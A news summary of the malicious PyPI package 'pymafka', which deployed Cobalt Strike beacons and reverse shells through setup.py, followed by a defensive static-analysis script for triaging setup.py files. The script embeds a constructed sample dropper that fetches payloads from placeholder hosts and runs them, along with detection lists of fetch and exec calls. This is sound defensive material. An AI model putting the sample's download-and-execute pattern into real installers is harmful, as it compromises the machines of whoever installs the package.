Windows, macOS, and Linux systems have been targeted in a supply chain attack by a new malicious Python package on PyPI that deploys backdoors and Cobalt Strike beacons, BleepingComputer reports.
Since being uploaded to PyPI on Tuesday, the malicious package, dubbed 'pymafka', was downloaded 325 times before being removed from the open-source package repository. Despite the limited download count, those who installed it can expect significant damage, because the package gives the attacker initial access to the developer's internal network, according to a report from Sonatype. The malicious code lives in the package's 'setup.py' script, which runs during installation of a source distribution, so simply running pip install on the package is enough to trigger it; nothing has to be imported. When 'setup.py' executes, it detects the device's operating system and then retrieves and executes a payload compatible with it. On Windows and macOS machines, pymafka retrieves a Cobalt Strike beacon to facilitate remote access to the device, while on Linux systems it triggers a reverse shell.
"On Windows systems, the Python script attempts to drop the Cobalt Strike beacon at 'C:\Users\Public\iexplorer.exe'. Note, this misspelling stands out as the legitimate Microsoft Internet Explorer process is typically called 'iexplore.exe' (no 'r' at the end) and isn't present in the C:\Users\Public directory," wrote researcher Ax Sharma.
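The install-time dropper shape described above (probe the OS, fetch a payload, execute it) and the dropped-file indicator in the quote can both be checked for before a package is ever installed, by parsing the sdist's setup.py instead of running it. The following is an added example and is not code from BleepingComputer, Sonatype or the pymafka package: the sample setup.py strings are constructed to mimic the described behaviour (placeholder `example.invalid` URLs and /tmp paths, not the real command-and-control infrastructure), and the function and constant names are the example's own.

```python
import ast

# Dotted names (matched by suffix, after import-alias resolution) that are
# individually ordinary but together form the install-time dropper pattern.
OS_DETECT = ("sys.platform", "platform.system", "platform.machine",
             "os.name", "os.uname")
NET_FETCH = ("urllib.request.urlopen", "urllib.request.urlretrieve",
             "requests.get", "requests.post", "socket.socket")
PROC_EXEC = ("os.system", "os.popen", "os.startfile", "os.execv",
             "subprocess.Popen", "subprocess.run", "subprocess.call",
             "subprocess.check_output", "subprocess.check_call")
# Case-insensitive string fragments tied to the indicator quoted above.
IOC_FRAGMENTS = ("iexplorer.exe", "users\\public")


def _alias_map(tree):
    """Map local names to the fully qualified names they were imported as."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:                      # import urllib.request as ur
                    aliases[a.asname] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            for a in node.names:                  # from os import system as s
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _dotted(node, aliases):
    """Return 'pkg.mod.attr' for a Name/Attribute chain, or '' otherwise."""
    if isinstance(node, ast.Name):
        return aliases.get(node.id, node.id)
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value, aliases)
        return f"{base}.{node.attr}" if base else ""
    return ""


def _matches(name, patterns):
    return any(name == p or name.endswith("." + p) for p in patterns)


def triage_setup_py(source):
    """Statically classify a setup.py. The source is parsed, never executed."""
    tree = ast.parse(source)
    aliases = _alias_map(tree)
    hits = {"os_detection": set(), "network_fetch": set(),
            "process_exec": set(), "ioc_strings": set()}
    for node in ast.walk(tree):
        if isinstance(node, (ast.Name, ast.Attribute)):
            name = _dotted(node, aliases)
            if _matches(name, OS_DETECT):
                hits["os_detection"].add(name)
            if _matches(name, NET_FETCH):
                hits["network_fetch"].add(name)
            if _matches(name, PROC_EXEC):
                hits["process_exec"].add(name)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(frag in node.value.lower() for frag in IOC_FRAGMENTS):
                hits["ioc_strings"].add(node.value)
    # The combination is the signal: an installer that probes the OS, pulls
    # from the network and spawns what it pulled. A known IOC string alone
    # is also enough to flag.
    result = {k: sorted(v) for k, v in hits.items()}
    result["suspicious"] = (bool(hits["os_detection"] and hits["network_fetch"]
                                 and hits["process_exec"])
                            or bool(hits["ioc_strings"]))
    return result


# Constructed sample mimicking the described dropper; URLs and paths are
# placeholders, not the real infrastructure. It is only parsed, never run.
SAMPLE_MALICIOUS_SETUP = r'''
import os, sys, platform, subprocess
from urllib.request import urlopen
from setuptools import setup

def fetch(url, dest):
    with urlopen(url) as r, open(dest, "wb") as f:
        f.write(r.read())

if sys.platform == "win32":
    dest = "C:\\Users\\Public\\iexplorer.exe"
    fetch("http://example.invalid/win", dest)
    subprocess.Popen([dest])
elif platform.system() == "Darwin":
    fetch("http://example.invalid/mac", "/tmp/.beacon")
    os.system("chmod +x /tmp/.beacon && /tmp/.beacon")
else:
    fetch("http://example.invalid/lin", "/tmp/.rs.sh")
    os.system("sh /tmp/.rs.sh")

setup(name="sample-pkg", version="0.1")
'''

# Constructed benign sample for comparison.
SAMPLE_BENIGN_SETUP = '''
from setuptools import setup
setup(name="benign-pkg", version="0.1", packages=["benign_pkg"])
'''

if __name__ == "__main__":
    for label, src in (("constructed dropper", SAMPLE_MALICIOUS_SETUP),
                       ("benign", SAMPLE_BENIGN_SETUP)):
        print(label, triage_setup_py(src))
```

In practice you would fetch the sdist without installing it (`pip download --no-deps --no-binary :all: <package>`), extract it, and run `triage_setup_py` over its setup.py before any `pip install`. The heuristic is deliberately coarse (a legitimate installer with a build-time download would also trip it), so treat a hit as a prompt to read the file, not as a verdict. The stronger control is to avoid running setup.py at all by installing only wheels (`pip install --only-binary :all: ...`) from an internal mirror where packages are vetted first.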